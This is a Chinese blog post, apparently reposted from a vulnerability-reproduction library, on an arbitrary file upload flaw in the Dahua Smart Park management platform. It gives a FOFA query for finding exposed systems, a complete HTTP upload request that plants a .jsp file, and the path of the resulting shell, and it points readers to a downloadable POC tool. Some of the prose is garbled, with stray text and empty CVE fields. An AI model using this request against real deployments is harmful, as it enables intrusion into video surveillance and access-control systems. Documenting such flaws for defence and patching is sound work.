Advertisement

大华智慧园区综合管理平台存在任意文件上传漏洞

阅读量:

大华智慧园区综合管理平台存在任意文件上传漏洞。该漏洞未对文件类型、大小、格式和路径进行严格限制和过滤,攻击者可通过构造恶意文件上传至设备上造成潜在危害。平台具备视频监控、报警系统等功能,并通过漏洞复现工具(如POC)进行验证与演示。厂商尚未提供相关补丁链接,请关注官方更新以修复此漏洞并防止潜在安全风险。此外,该漏洞已引起关注(如往期回顾中的其他类似问题)。

大华智慧园区综合管理平台存在任意文件上传漏洞

免责声明:请勿运用文章中的相关技术进行不当测试。由于传播或使用本文提供的信息或工具所引发的任何直接或间接的后果及损失,请使用者自行承担。该文章仅限于学习目的使用。

1. 大华智慧园区综合管理平台简介

通过微信公众号搜索平台访问'南风漏洞复现文库'。其中,《南风漏洞复现文库》作为一篇重要的文章,在本平台首次发布。

大华智慧园区综合管理平台主要用于整合四个安全监控系统的视频采集、报警报备、门禁管控和对讲通讯等功能。

2.漏洞描述

大华智慧园区综合管理平台是一种集成了多种功能的管理系统,在园区运营协调、资源调配优化以及智能化服务方面具有显著优势

CVE编号:

CNNVD编号:

CNVD编号:

3.影响版本

图片

4.fofa查询语句

"/WPMS/asset/lib/gridster/"

5.漏洞复现

漏洞数据包:

复制代码
 POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1

    
 Host: 127.0.0.1
    
 User-Agent: python-requests/2.26.0
    
 Accept-Encoding: gzip, deflate
    
 Accept: */*
    
 Connection: Keep-Alive
    
 Content-Length: 228
    
 Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982
    
  
    
 --f3aeb22be281d77542546a2f71e20982
    
 Content-Disposition: form-data; name="upload"; filename="a.jsp"
    
 Content-Type: application/octet-stream
    
 Content-Transfer-Encoding: binary
    
  
    
 1657966889
    
 --f3aeb22be281d77542546a2f71e20982--
    
    
    
    
    AI助手
图片

shell地址链接:http://127.0.0.1/upload/emap/society_new/ico_res_f61fad3abc99_on.jsp

ico_res_f61fad3abc99_on.jsp 替换成你们上传数据包回显的文件名

图片

6.POC&EXP

请关注南风漏洞复现文库,并回复'漏洞复现41'即可获取该POC工具的下载地址

7.整改意见

目前厂商尚未发布漏洞修复说明文档,请访问其官方主页持续关注最新动态:https://www.dahuatech.com/

8.往期回顾

艾科思(霆智科技)应用接入系统的功能模块中可能存在文件读取权限配置不当的问题

目前/nginxWebUI 存在远程操作权限漏洞 "https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247484097&idx=1&sn=692796cbd73f3dc81074880f34fcabc4&chksm=974b8fc6a03c06d0d12766a6886d6e64736fe5c7181684794db75dc7d828cbb104dacbce6a62&scene=21#wechat_redirect

全部评论 (0)

还没有任何评论哟~